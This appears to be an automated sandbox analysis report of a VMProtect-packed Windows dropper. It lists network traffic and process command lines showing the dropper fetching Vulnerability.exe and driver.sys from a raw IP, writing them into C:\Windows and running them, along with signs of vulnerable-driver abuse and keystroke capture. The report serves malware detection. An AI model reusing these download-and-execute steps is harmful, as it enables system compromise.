00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 93 4c 01 00 00 10 00 00 00 4e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 cb 00 00 00 60 01 00 00 cc 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f0 0c 00 00 00 30 02 00 00 06 00 00 00 1e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 30 0f 00 00 00 40 02 00 00 10 00 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e8 01 00 00 00 50 02 00 00 02 00 00 00 34 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 08 01 00 00 00 60 02 00 00 02 00 00 00 36 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 19:15:03 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 03 Oct 2024 19:27:48 GMTETag: "2a00-623978cbb6377"Accept-Ranges: bytesContent-Length: 10752Keep-Alive: timeout=5, max=99Connection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 11 41 b6 a6 55 20 d8 f5 55 20 d8 f5 55 20 d8 f5 55 20 d8 f5 54 20 d8 f5 1e 58 d9 f4 56 20 d8 f5 55 20 d9 f5 4e 20 d8 f5 1e 58 db f4 53 20 d8 f5 1e 58 dc f4 50 20 d8 f5 3a a1 dd f4 54 20 d8 f5 3a a1 da f4 54 20 d8 f5 52 69 63 68 55 20 d8 f5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 34 f0 fe 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 26 00 18 00 00 00 0e 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 0a 00 00 00 00 00 00 00 00 80 00 00 00 04 00 00 74 b0 00 00 01 00 60 41 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 24 00 00 00 60 32 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 31 00 00 40 01 00 00 00 00 00 00 00 00 00 00 00 30 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d2 12 00 00 00 10 00 00 00 14 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 68 2e 72 64 61 74 61 00 00 50 06 00 00 00 30 00 00 00 08 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2e 64 61 74 61 00 00 00 8c 00 00 00 00 40 00 00 00 02 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c8 2e 70 64 61 74 61 00 00 fc 00 00 00 00 50 00 00 00 02 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 49 4e 49 54 00 00 00 00 04 03 00 00 00 60 00 00 00 04 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 62 2e 72 65 6c 6f 63 00 00 24 00 00 00 00 70 00 00 00 02 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 172.67.72.57 172.67.72.57

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /Vulnerability.exe HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /driver.sys HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122

Source: global traffic	HTTP traffic detected: GET /Vulnerability.exe HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /driver.sys HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: keyauth.win

Source: Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmp, Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC0205000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC020A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.101.104.122/Vulnerability.exe
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.101.104.122/Vulnerability.exeC9?
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC0205000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC020A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.101.104.122/Vulnerability.exeC:
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC0205000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC020A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.101.104.122/Vulnerability.exev
Source: Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.101.104.122/driver.sys
Source: Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.101.104.122/driver.sysC:
Source: Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.101.104.122/driver.sysW
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.101.104.122/driver.syse
Source: Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.101.104.122/driver.sysl
Source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gscodesigng2.crl0
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr	String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesigng20
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng2.crt04
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
Source: Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://keyauth.win/api/1.2/
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://keyauth.win/api/1.2/2(f
Source: Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://keyauth.win/api/1.2/http://185.101.104.122/Vulnerability.exeC:
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: Iyto7FYCJO.exe, 00000000.00000002.2223557132.00007FF7A27F2000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.behance.net/madetypeFree
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr	String found in binary or memory: https://www.globalsign.com/repository/03

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710

Source: unknown

HTTPS traffic detected: 172.67.72.57:443 -> 192.168.2.5:49710 version: TLS 1.2

Installs a raw input device (often for capturing keystrokes)

Source: Vulnerability.exe, 00000005.00000002.2106140610.000002B69E945000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: NtUserGetRawInputData

memstr_6d72b45d-7

System Summary

Detected VMProtect packer

Source: Iyto7FYCJO.exe

Static PE information: .vmp0 and .vmp1 section names

Contains functionality to call native functions

Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738E6810 NtQuerySystemInformation,VirtualFree,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,VirtualFree,DeviceIoControl,DeviceIoControl,DeviceIoControl,DeviceIoControl,memset,DeviceIoControl,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,VirtualFree,		5_2_00007FF7738E6810
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738F32C0 NtQuerySystemInformation,VirtualFree,VirtualAlloc,NtQuerySystemInformation,VirtualFree,_stricmp,VirtualFree,VirtualFree,_invalid_parameter_noinfo_noreturn,		5_2_00007FF7738F32C0

Contains functionality to communicate with device drivers

Source: C:\Windows\Vulnerability.exe

5_2_00007FF7738E45E0

Creates driver files

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sys

Jump to behavior

Creates files inside the system directory

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Windows\Vulnerability.exe	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Windows\driver.sys	Jump to behavior
Source: C:\Windows\Vulnerability.exe	File created: C:\Windows\symbols\	Jump to behavior

Detected potential crypto function

Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738E3CE0	5_2_00007FF7738E3CE0
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738E1330	5_2_00007FF7738E1330
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738F1630	5_2_00007FF7738F1630
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738E45E0	5_2_00007FF7738E45E0
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738E6440	5_2_00007FF7738E6440
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738EFBF0	5_2_00007FF7738EFBF0
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738E6810	5_2_00007FF7738E6810
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738E5010	5_2_00007FF7738E5010
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738F3B60	5_2_00007FF7738F3B60
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738E72B0	5_2_00007FF7738E72B0
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738E7EA0	5_2_00007FF7738E7EA0
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738F32C0	5_2_00007FF7738F32C0

Found potential string decryption / allocating functions

Source: C:\Windows\Vulnerability.exe

Code function: String function: 00007FF7738EA3C0 appears 102 times

One or more processes crash

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1308 -s 1708

Source: driver[1].sys.0.dr	Binary string: \Device\{83040329-923403830}
Source: Vulnerability.exe.0.dr	Binary string: \Device\PhysicalMemory
Source: Vulnerability.exe.0.dr	Binary string: 0\DosDevices\RTCore64\Device\RTCore64

Source: classification engine

Classification label: mal100.expl.evad.winEXE@25/5@1/3

Source: C:\Windows\Vulnerability.exe

Code function: 5_2_00007FF7738F14C0 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,Process32NextW,CloseHandle,

5_2_00007FF7738F14C0

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vulnerability[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1812:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6520:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_03

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\60023779-100a-4137-a2cb-f060494dee00

Jump to behavior

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Iyto7FYCJO.exe

ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Users\user\Desktop\Iyto7FYCJO.exe "C:\Users\user\Desktop\Iyto7FYCJO.exe"
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cd C:\
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driver.sys
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Vulnerability.exe C:\Windows\Vulnerability.exe C:\Windows\driver.sys
Source: C:\Windows\Vulnerability.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5 \| find /i /v "md5" \| find /i /v "certutil"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i /v "md5"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i /v "certutil"
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1308 -s 1708
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cd C:\	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driver.sys	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5 \| find /i /v "md5" \| find /i /v "certutil"	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Vulnerability.exe C:\Windows\Vulnerability.exe C:\Windows\driver.sys	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i /v "md5"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i /v "certutil"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 5	Jump to behavior

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: kernel.appcore.dll	Jump to behavior
